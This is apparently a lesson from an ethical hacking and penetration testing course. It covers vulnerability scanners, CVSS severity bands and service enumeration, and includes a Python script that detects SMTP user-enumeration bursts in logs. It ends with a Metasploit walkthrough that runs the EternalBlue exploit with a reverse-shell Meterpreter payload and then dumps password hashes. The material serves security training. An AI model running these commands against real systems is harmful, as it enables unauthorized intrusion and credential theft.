Ethical Hacking & VAPT

Scanning, Enumeration & Exploitation

65 min

Vulnerability Scanning

After reconnaissance, systematically scan for known vulnerabilities in identified services and applications.

VULNERABILITY SCANNERS
  • Nessus (Tenable) — Industry standard; 70,000+ plugins
  • OpenVAS/GVM — Open source alternative to Nessus
  • Nikto — Web server scanner (quick + noisy)
  • OWASP ZAP — Web application scanner
  • Nuclei — Fast template-based scanning
  • Qualys — Cloud-based enterprise scanner

CVE Scoring (CVSS v3):
  • 0.0 — None
  • 0.1-3.9 — Low
  • 4.0-6.9 — Medium
  • 7.0-8.9 — High
  • 9.0-10.0 — Critical (immediate action required)

Service Enumeration

  • SMB (445) — enum4linux, smbclient; enumerate users, shares, OS
  • SMTP (25) — User enumeration via VRFY/EXPN commands
  • SNMP (161) — Community string brute force; exposes system info
  • LDAP (389) — Enumerate Active Directory objects
  • FTP (21) — Check for anonymous login; directory listing
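
The SMTP VRFY/EXPN user enumeration listed above, seen from the defender's side: an added example (not part of this lesson) that flags a client issuing a burst of VRFY/EXPN probes in SMTP server logs. The log lines are constructed, and the simplified log format, the threshold of five probes and the one-minute window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines, "timestamp client command argument reply-code" (an assumed format, not a real MTA's).
SAMPLE_LOG = """\
2024-03-03T10:01:02 203.0.113.7 VRFY root 252
2024-03-03T10:01:02 203.0.113.7 VRFY admin 550
2024-03-03T10:01:03 203.0.113.7 VRFY postmaster 252
2024-03-03T10:01:03 203.0.113.7 EXPN staff 550
2024-03-03T10:01:04 203.0.113.7 VRFY backup 550
2024-03-03T10:01:04 203.0.113.7 VRFY test 550
2024-03-03T10:05:30 198.51.100.9 VRFY postmaster 252
2024-03-03T10:09:10 203.0.113.7 MAIL FROM:<a@example.org> 250
"""

# Match only VRFY/EXPN lines; every other SMTP command fails to match and is skipped.
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<cmd>VRFY|EXPN) (?P<arg>\S+) (?P<code>\d{3})$")

def parse(log_text):
    """Yield (timestamp, client_ip, command, argument, reply_code) per VRFY/EXPN line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["ip"], m["cmd"], m["arg"], int(m["code"])

def detect_enumeration(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return {client_ip: summary} for clients sending >= threshold VRFY/EXPN within `window`.
    A lone VRFY (a postmaster check) stays below threshold; a burst of probes for distinct
    names, mostly rejected with 5xx, is the enumeration signature."""
    events = defaultdict(list)
    for ts, ip, cmd, arg, code in parse(log_text):
        events[ip].append((ts, cmd, arg, code))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        best, start = None, 0
        for end in range(len(evs)):
            # Slide the window start forward until the chunk spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            chunk = evs[start:end + 1]
            if len(chunk) >= threshold and (best is None or len(chunk) > best["probes"]):
                best = {"probes": len(chunk),
                        "distinct_names": len({e[2] for e in chunk}),
                        "rejected": sum(1 for e in chunk if e[3] >= 500)}
        if best:
            alerts[ip] = best
    return alerts
```

Running `detect_enumeration(SAMPLE_LOG)` reports only 203.0.113.7 (six probes for six names, four rejected); the single postmaster check from 198.51.100.9 is not flagged.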

Metasploit Framework

The world's most widely used penetration testing framework. Provides exploit modules, payloads, and post-exploitation tools.

METASPLOIT BASIC WORKFLOW
  msfconsole                                        # Start Metasploit
  search ms17-010                                   # Search EternalBlue exploit
  use exploit/windows/smb/ms17_010_eternalblue
  set RHOSTS 192.168.1.100                          # Target IP
  set LHOST 192.168.1.50                            # Attacker IP
  set payload windows/x64/meterpreter/reverse_tcp
  run                                               # Launch exploit

  # Post-exploitation (Meterpreter):
  sysinfo                                           # System information
  getuid                                            # Current user
  hashdump                                          # Dump password hashes
  getsystem                                         # Privilege escalation attempt